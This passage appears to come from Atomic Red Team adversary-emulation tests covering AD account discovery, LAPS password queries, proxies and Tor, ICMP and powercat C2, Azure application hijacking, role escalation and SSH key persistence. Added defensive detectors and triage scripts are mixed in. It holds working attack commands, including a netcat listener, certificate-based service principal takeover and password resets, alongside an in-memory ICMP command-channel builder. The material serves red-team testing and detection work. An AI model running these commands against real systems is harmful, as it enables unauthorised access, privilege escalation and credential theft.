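        if not uac & TRUSTED_FOR_DELEGATION:
            continue
        if uac & SERVER_TRUST_ACCOUNT and not include_domain_controllers:
            continue
        hits.append(obj["dn"])
    return hits


# Constructed sample: what a directory search might return (hypothetical names).
SAMPLE_COMPUTERS = [
    {"dn": "CN=DC01,OU=Domain Controllers,DC=corp,DC=example", "userAccountControl": 532480},  # 0x82000
    {"dn": "CN=WEB01,CN=Computers,DC=corp,DC=example", "userAccountControl": 528384},          # 0x81000
    {"dn": "CN=WS05,CN=Computers,DC=corp,DC=example", "userAccountControl": 4096},             # 0x1000
    {"dn": "CN=SQL02,CN=Computers,DC=corp,DC=example", "userAccountControl": 16781312},        # 0x1001000
]

if __name__ == "__main__":
    print(unconstrained_delegation_filter())
    for obj in SAMPLE_COMPUTERS:
        print(obj["dn"], decode_uac(obj["userAccountControl"]))
    print("unconstrained (non-DC):", find_unconstrained(SAMPLE_COMPUTERS))
```

The same filter can be handed to the ActiveDirectory module as `Get-ADComputer -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'`; SQL02 in the sample is not reported because TRUSTED_TO_AUTH_FOR_DELEGATION is constrained delegation, a different (though also sensitive) configuration.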
Description: The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
T1087.002 - Account Discovery: Domain Account
Enumerate Linked Policies In ADSISearcher Discovery
Description: The following Atomic test will utilize ADSISearcher to enumerate organizational units within Active Directory.
Upon successful execution a listing of organizational units will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Description: The following Atomic test will utilize ADSISearcher to enumerate the root domain object within Active Directory.
Upon successful execution the root domain object will output with its path in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Description: This test discovers users who have authenticated against a Domain Controller via NTLM.
This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the output in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
Cleanup:
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with Get-ADComputer all properties
Get-ADComputer $env:computername -Properties *
Description: This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
Description: This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
Description: This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with adfind all properties
Description: This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
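The five LAPS tests above differ only in whether the password attributes are named explicitly or swept up by a wildcard (`-Properties *`, or adfind with no attribute list, which returns everything). As an added example that is not part of Atomic Red Team, the Python below classifies LDAP search requests on exactly that split. The record shape (client, filter, scope, attributes) and the sample requests are constructed; map them from whatever LDAP telemetry you have. The legacy LAPS attribute names are the ones the tests query; the Windows LAPS names (msLAPS-*) are included so the same check covers both deployments.

```python
# Added example: flag LDAP searches that read LAPS password attributes, either
# by naming them or by requesting every attribute of computer objects.
# Record shape and sample records are constructed for this example.

LAPS_ATTRIBUTES = {
    # Legacy LAPS (the attributes the atomic tests above query)
    "ms-mcs-admpwd",
    "ms-mcs-admpwdexpirationtime",
    # Windows LAPS
    "mslaps-password",
    "mslaps-encryptedpassword",
    "mslaps-passwordexpirationtime",
}
WILDCARD_ATTRIBUTES = {"*", "+"}  # '*' = all user attributes, '+' = all operational attributes
COMPUTER_FILTER_MARKERS = ("objectcategory=computer", "objectclass=computer", "samaccounttype=805306369")


def targets_computers(ldap_filter):
    f = ldap_filter.lower().replace(" ", "")
    return any(marker in f for marker in COMPUTER_FILTER_MARKERS)


def classify_ldap_search(rec):
    """Return 'laps-explicit', 'laps-wildcard' or 'benign' for one search request.

    rec = {"client": str, "filter": str, "scope": "base|onelevel|subtree", "attributes": [str]}
    An empty attribute list means 'all attributes' in LDAP, the same as '*'.
    """
    attrs = {a.lower() for a in rec.get("attributes", [])}
    if attrs & LAPS_ATTRIBUTES:
        return "laps-explicit"
    wildcard = not attrs or bool(attrs & WILDCARD_ATTRIBUTES)
    if wildcard and targets_computers(rec["filter"]):
        return "laps-wildcard"
    return "benign"


def triage(records):
    """Keep only flagged requests. A subtree wildcard sweep is listed first: one
    such request can return the LAPS password of every computer in the domain."""
    findings = []
    for rec in records:
        verdict = classify_ldap_search(rec)
        if verdict == "benign":
            continue
        broad = verdict == "laps-wildcard" and rec.get("scope") == "subtree"
        findings.append({"client": rec["client"], "verdict": verdict, "broad": broad, "filter": rec["filter"]})
    return sorted(findings, key=lambda f: (not f["broad"], f["client"]))


# Constructed sample requests mirroring the tests above (addresses are hypothetical).
SAMPLE_REQUESTS = [
    # Get-ADComputer $env:computername -Properties *   (base search, all attributes)
    {"client": "10.0.0.15", "filter": "(&(objectCategory=computer)(name=WS05))", "scope": "base", "attributes": ["*"]},
    # Get-ADComputer ... -Properties ms-Mcs-AdmPwd
    {"client": "10.0.0.15", "filter": "(&(objectCategory=computer)(name=WS05))", "scope": "base",
     "attributes": ["ms-Mcs-AdmPwd", "ms-Mcs-AdmPwdExpirationTime"]},
    # Get-ADComputer -Filter * -SearchScope Subtree -Properties *, or adfind with no attribute list
    {"client": "10.0.0.99", "filter": "(objectCategory=computer)", "scope": "subtree", "attributes": []},
    # Ordinary inventory query: named, harmless attributes
    {"client": "10.0.0.20", "filter": "(objectCategory=computer)", "scope": "subtree", "attributes": ["name", "operatingSystem"]},
    # All attributes of a user object: not a LAPS read
    {"client": "10.0.0.20", "filter": "(&(objectCategory=person)(sAMAccountName=jdoe))", "scope": "base", "attributes": ["*"]},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding)
```

Reading a LAPS password is legitimate for the helpdesk, so the useful signal is usually the combination of wildcard plus subtree scope, or an explicit read from a client that is not a known management host; tune the client list accordingly.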
Description: This test uses LDAPDomainDump to perform account enumeration on a domain.
[Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
Prereq: Python3 must be installed
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
Prereq: Pip must be installed
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
Prereq: The ldapdomaindump module must be installed
Description: Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
Cleanup:
networksetup -setwebproxystate Wi-Fi off
networksetup -setsecurewebproxystate Wi-Fi off
Description: Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
Upon execution there will be a new proxy entry in netsh
netsh interface portproxy show all
Description: Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
with uncensored access to the Internet.
This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
More information can be found about Psiphon using the following urls
http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
https://psiphon.ca/faq.html
Prereq: The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
Prereq: The Psiphon executable must exist in the Downloads folder
if (Test-Path "..\ExternalPayloads\psiphon3.exe") {exit 0} else {exit 1}
Prereq: Batch file containing commands to run must be in src directory
if (Test-Path "T1090.003\src\Psiphon.bat") {exit 0} else {exit 1}
Description: This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit.
Prereq: tor.exe must be installed on the machine
if (Test-Path "..\ExternalPayloads\tor\Tor\tor.exe") {exit 0} else {exit 1}
T1090.003 - Proxy: Multi-hop Proxy
Tor Proxy Usage - Debian/Ubuntu/FreeBSD
[ "$(uname)" = 'FreeBSD' ] && sysrc tor_enable="YES" && service tor start || sudo systemctl start tor
Description: This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
Prereq: Tor must be installed on the machine
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
Cleanup:
[ "$(uname)" = 'FreeBSD' ] && service tor stop && sysrc -x tor_enable || sudo systemctl stop tor
T1090.003 - Proxy: Multi-hop Proxy
Tor Proxy Usage - MacOS
osascript -e 'tell application "Terminal" to do script "tor"'
Description: This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
Prereq: Tor must be installed on the machine
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
Cleanup:
killall tor > /dev/null 2>&1
T1091 - Replication Through Removable Media
USB Malware Spread Simulation
$RemovableDrives=@()
$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID
ForEach ($Drive in $RemovableDrives) {
    write-host "Removable Drive Found:" $Drive
    New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives."
}
Description: Simulates an adversary copying malware to all connected removable drives.
Description: This will attempt to start C2 Session Using ICMP. For information on how to set up the listener
refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
Description: Start C2 Session Using Powercat
To start the listener on a Linux device, type the following:
nc -l -p
T1095 - Non-Application Layer Protocol
Linux ICMP Reverse Shell using icmp-cnc
{MISSING IN ATOMIC RED TEAM}
Description: ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
This method allows attackers to communicate and control compromised devices while remaining undetected.
For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)
**Important Notes:**
- Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
- Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
- Root access is required.
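To make the mechanism concrete, here is an added example of my own (not the icmp-cnc or icmpdoor code): it builds an ICMP echo request whose payload carries a command, builds the echo reply that carries the output, and verifies the RFC 1071 checksum on parse. It also shows the payload check a detector can apply: stock ping payloads are fixed patterns (the Windows ping alphabet, and the iputils fill of a timestamp followed by bytes 0x10 through 0x37), so a payload that matches neither is worth a look. Packets are built as bytes and never sent, so no root is needed to run it; the identifier, command and output strings are hypothetical.

```python
# Added example: ICMP echo as a command channel, built and parsed in memory.
# Not the icmpdoor/icmp-cnc code; packet fields are hypothetical sample values.
import struct

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8
HEADER = "!BBHHH"  # type, code, checksum, identifier, sequence


def icmp_checksum(data):
    """RFC 1071 one's-complement checksum over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type, ident, seq, payload):
    """Build an echo request/reply; the checksum is computed with the field zeroed."""
    header = struct.pack(HEADER, icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack(HEADER, icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet):
    """Parse and verify an echo packet. Summing a valid packet, checksum field included, gives 0."""
    if len(packet) < 8:
        raise ValueError("short ICMP packet")
    if icmp_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _, ident, seq = struct.unpack(HEADER, packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq, "payload": packet[8:]}


# The channel: the C2 server puts a command in an echo request; the implant on the
# victim answers with the output in an echo reply that reuses the id and sequence,
# so to a casual observer it is a ping and its answer.
def c2_request(ident, seq, command):
    return build_echo(ICMP_ECHO_REQUEST, ident, seq, command.encode())


def implant_reply(request, run):
    req = parse_echo(request)
    output = run(req["payload"].decode())
    return build_echo(ICMP_ECHO_REPLY, req["id"], req["seq"], output.encode())


# Detection side: stock ping payloads are fixed patterns; anything else is worth a look.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"  # 32 bytes
IPUTILS_FILL = bytes(range(0x10, 0x38))                      # 40 bytes after a 16-byte timestamp


def looks_like_covert(payload):
    """Heuristic: True unless the payload matches a known benign ping pattern."""
    if payload == WINDOWS_PING_PAYLOAD:
        return False
    if len(payload) == 56 and payload[16:] == IPUTILS_FILL:
        return False
    return True


if __name__ == "__main__":
    fake_shell = {"id": "uid=0(root) gid=0(root) groups=0(root)"}  # constructed output
    req = c2_request(0x1337, 1, "id")
    rep = implant_reply(req, lambda cmd: fake_shell.get(cmd, "command not found"))
    print(parse_echo(rep)["payload"].decode())
    print("request flagged:", looks_like_covert(parse_echo(req)["payload"]))
```

The whitelist is deliberately narrow: a real implant can pad its payload to look like iputils output, so in practice pair the payload check with volume (echo requests to one host at a steady cadence) and with echo replies that carry more data than the request did.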
$sp = Get-AzureADServicePrincipal -SearchString "SuperSP" | Select-Object -First 1
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long.
# In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$credNotAfter = (Get-Date).AddDays(1)
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
Description: Add a certificate to an Application through its Service Principal. The certificate can then be used to authenticate as the application.
This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights.
An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
$app = Get-AzureADApplication -SearchString "SuperApp" | Select-Object -First 1
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long.
# In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$credNotAfter = (Get-Date).AddDays(1)
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
Description: Add a certificate to an Application through its App Registration. The certificate can then be used to authenticate as the application.
This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights.
An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
Description: Give a nominated user, full mailbox delegation access of another user.
This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
Prereq: ExchangeOnlineManagement PowerShell module must be installed
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
#Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -filter "userPrincipalName eq 'default'" | Select-Object -ExpandProperty ObjectId
#Reset the password of the target_user
Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
Description: This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
Prereq: MSOnline and AzureAD modules must be installed.
if ($notInstalled) {
    # Prompt for installing the missing ones.
    Write-Output "The following PS modules aren't currently installed:"
    $notInstalled
    exit 1
}
else {
    Write-Output "All required PS modules are installed"
    exit 0
}
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
Description: Modify contents of /.ssh/authorized_keys to maintain persistence on victim host.
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
Description: Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins).
The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriate AD privileges to
create the user and alter the group. Automatic installation of the dependency requires an elevated session,
and is unlikely to work with Powershell Core (untested).
If you consider running this test against a production Active Directory, the good practice is to create a dedicated
service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
as group manager of the target group.
Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
$user = Get-AzureADUser -Filter "DisplayName eq 'SuperUser' or UserPrincipalName eq 'SuperUser'"
if ($user -eq $null) { Write-Warning "User not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Reader'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
Description: The adversaries want to add user to some Azure AD role. Threat actor
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged Authentication Administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to the user principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In the target you will also see User as a type.
$sp = Get-AzureADServicePrincipal -Filter "DisplayName eq 'SuperSP'"
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Reader'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
Description: The adversaries want to add service principal to some Azure AD role. Threat actor
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged Authentication Administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to service principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In the target you will also see Service Principal as a type.
$sp = Get-AzureADServicePrincipal -Filter "DisplayName eq 'SuperSP'"
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Reader'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$($subscription.Id)
Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscription $($subscription.Name)"
Description: The adversaries want to add user to some Azure role, also called Azure resource role. Threat actor
may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
By default, the role Reader is assigned to user in this test.
The New-AzRoleAssignment cmdlet can also be used to assign a user or service principal to a resource, resource group or management group.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$($subscription.Id)
Write-Host "User $($user.DisplayName) was removed from $($role.Name) role in subscription $($subscription.Name)"
T1098 - Account Manipulation
Azure - adding service principal to Azure role in subscription
$sp = Get-AzADServicePrincipal | Where-Object {$_.DisplayName -eq "SuperSP"}
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$subscription = Get-AzSubscription | Where-Object {$_.Name -eq "Azure subscription 1"}
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | Where-Object {$_.Name -eq "Reader"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$($subscription.Id)
Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscription $($subscription.Name)"
Description: The adversary wants to add a service principal to an Azure role (also called an Azure resource role). A threat actor
is primarily interested in highly privileged roles, e.g. Owner or Contributor.
By default, this test assigns the Reader role to the service principal.
The New-AzRoleAssignment cmdlet can also assign a user or service principal at resource, resource group or management group scope.
The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
(e.g. User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
and Microsoft Graph Directory.Read.All permissions.
Detection hint - check Operation Name "Create role assignment" in the subscription's Activity Log.
$sp = Get-AzADServicePrincipal | Where-Object {$_.DisplayName -eq "SuperSP"}
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$subscription = Get-AzSubscription | Where-Object {$_.Name -eq "Azure subscription 1"}
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | Where-Object {$_.Name -eq "Reader"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$($subscription.Id)
Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscription $($subscription.Name)"
Description: The adversary wants to add a permission to a newly created application. The application can then be used for persistence or for further operations in the attacked infrastructure. Permissions such as AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular are valuable to a threat actor.
This test creates a new app with the provided name and grants it the provided permission. To grant the permission to an existing app instead, look the app up with Get-AzureADApplication in place of creating a new one.
The DirectoryRecommendations.Read.All permission is selected as the default.
The account you use to run the PowerShell command should have the Global Administrator, Application Administrator or Cloud Application Administrator role in your Azure AD.
Detection hint - check Activity "Add app role assignment to service principal" in Azure AD Audit Logs (this is a directory operation, so it does not appear in the subscription Activity Log).
You can also take a look at these materials:
https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
https://github.com/reprise99/Sentinel-Queries
https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
$aadApplication = @(Get-AzureADApplication -Filter "DisplayName eq 'test_app'")
If ($aadApplication.Count -eq 0) {
  Write-Host "App not found: cannot delete it"
  exit
} ElseIf ($aadApplication.Count -gt 1) {
  Write-Host "Found several apps with name 'test_app': one is likely the one this technique created, but as a precaution, none will be deleted. Manual cleanup is required."
  exit
} Else {
  Remove-AzureADApplication -ObjectId $aadApplication[0].ObjectId
  Write-Host "Successfully deleted app"
}
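The three Azure tests above (directory role membership, subscription RBAC assignment, application permission grant) each leave one of three audit activities behind. The following is an added example, not Atomic Red Team code, that triages such records the way a detection engineer would: it flags service principals landing in directory roles or subscription-wide RBAC, and raises severity for the privileged roles and permissions the descriptions name. The event records, their field names and the tenant values are constructed and simplified; real Azure AD Audit Log and Activity Log exports nest these fields, so map them when wiring this to a real feed.

```powershell
# Added example (not part of Atomic Red Team): triage the audit events the
# Azure tests above generate. Record layout and values are constructed.

$PrivilegedDirectoryRoles = @(
    'Global Administrator', 'Privileged Role Administrator',
    'Privileged Authentication Administrator', 'Application Administrator',
    'Cloud Application Administrator'
)
$PrivilegedRbacRoles = @('Owner', 'Contributor', 'User Access Administrator')
$PrivilegedAppPermissions = @(
    'AppRoleAssignment.ReadWrite.All', 'RoleManagement.ReadWrite.Directory',
    'Directory.ReadWrite.All', 'Application.ReadWrite.All'
)

function Get-RoleAssignmentFindings {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        $reasons = [System.Collections.Generic.List[string]]::new()

        switch ($e.Activity) {
            'Add member to role' {
                # Azure AD directory role membership (Add-AzureADDirectoryRoleMember)
                if ($e.TargetType -eq 'ServicePrincipal') {
                    $reasons.Add('service principal added to a directory role')
                }
                if ($PrivilegedDirectoryRoles -contains $e.Role) {
                    $reasons.Add("privileged directory role '$($e.Role)'")
                }
            }
            'Create role assignment' {
                # Azure RBAC at subscription scope or below (New-AzRoleAssignment)
                if ($PrivilegedRbacRoles -contains $e.Role) {
                    $reasons.Add("privileged RBAC role '$($e.Role)'")
                }
                if ($e.TargetType -eq 'ServicePrincipal' -and $e.Scope -match '^/subscriptions/[^/]+$') {
                    $reasons.Add('service principal granted a subscription-wide assignment')
                }
            }
            'Add app role assignment to service principal' {
                # Application permission grant (Role carries the permission name here)
                if ($PrivilegedAppPermissions -contains $e.Role) {
                    $reasons.Add("privileged application permission '$($e.Role)'")
                }
            }
        }

        if ($reasons.Count -gt 0) {
            $severity = if (($reasons -join ' ') -match 'privileged') { 'High' } else { 'Medium' }
            [pscustomobject]@{
                Time     = $e.Time
                Actor    = $e.Actor
                Activity = $e.Activity
                Target   = $e.Target
                Role     = $e.Role
                Severity = $severity
                Reasons  = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample records mirroring what the tests above produce.
$SampleEvents = @(
    [pscustomobject]@{ Time='2025-10-18T09:01:00Z'; Actor='admin@contoso.example'; Activity='Add member to role'
                       Target='SuperSP'; TargetType='ServicePrincipal'; Role='Global Reader'; Scope=$null }
    [pscustomobject]@{ Time='2025-10-18T09:02:00Z'; Actor='admin@contoso.example'; Activity='Add member to role'
                       Target='SuperSP'; TargetType='ServicePrincipal'; Role='Privileged Authentication Administrator'; Scope=$null }
    [pscustomobject]@{ Time='2025-10-18T09:03:00Z'; Actor='admin@contoso.example'; Activity='Create role assignment'
                       Target='SuperSP'; TargetType='ServicePrincipal'; Role='Reader'; Scope='/subscriptions/00000000-0000-0000-0000-000000000000' }
    [pscustomobject]@{ Time='2025-10-18T09:04:00Z'; Actor='admin@contoso.example'; Activity='Create role assignment'
                       Target='jdoe@contoso.example'; TargetType='User'; Role='Owner'; Scope='/subscriptions/00000000-0000-0000-0000-000000000000' }
    [pscustomobject]@{ Time='2025-10-18T09:05:00Z'; Actor='admin@contoso.example'; Activity='Add app role assignment to service principal'
                       Target='test_app'; TargetType='ServicePrincipal'; Role='DirectoryRecommendations.Read.All'; Scope=$null }
    [pscustomobject]@{ Time='2025-10-18T09:06:00Z'; Actor='admin@contoso.example'; Activity='Add app role assignment to service principal'
                       Target='test_app'; TargetType='ServicePrincipal'; Role='RoleManagement.ReadWrite.Directory'; Scope=$null }
    [pscustomobject]@{ Time='2025-10-18T09:07:00Z'; Actor='admin@contoso.example'; Activity='Update user'
                       Target='jdoe@contoso.example'; TargetType='User'; Role=$null; Scope=$null }
)

Get-RoleAssignmentFindings -Events $SampleEvents | Format-Table -AutoSize
```

Run against the sample set, the default Global Reader, Reader and DirectoryRecommendations.Read.All grants surface as Medium (the service principal is the signal, not the role), the Privileged Authentication Administrator, Owner and RoleManagement.ReadWrite.Directory grants surface as High, and the unrelated "Update user" record is ignored. The privileged lists are a starting point; extend them with whatever your tenant treats as tier 0.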
T1098 - Account Manipulation
Password Change on Directory Service Restore Mode (DSRM) Account
Description: Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account
T1098 - Account Manipulation
Domain Password Policy Check: Short Password
$credFile = "$env:LOCALAPPDATA\AtomicRedTeam\$env:USERNAME.txt"
if (Test-Path $credFile) {
  $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
  if ($cred.GetNetworkCredential().Password -eq "Uplow-1") {
    Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
  }
  try {
    $newPassword = ConvertTo-SecureString Uplow-1 -AsPlainText -Force
    Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
  } catch {
    $_.Exception
    $errCode = $_.Exception.ErrorCode
    Write-Host "Error code: $errCode"
    if ($errCode -eq 86) {
      Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
      Remove-Item $credFile
    }
    exit $errCode
  }
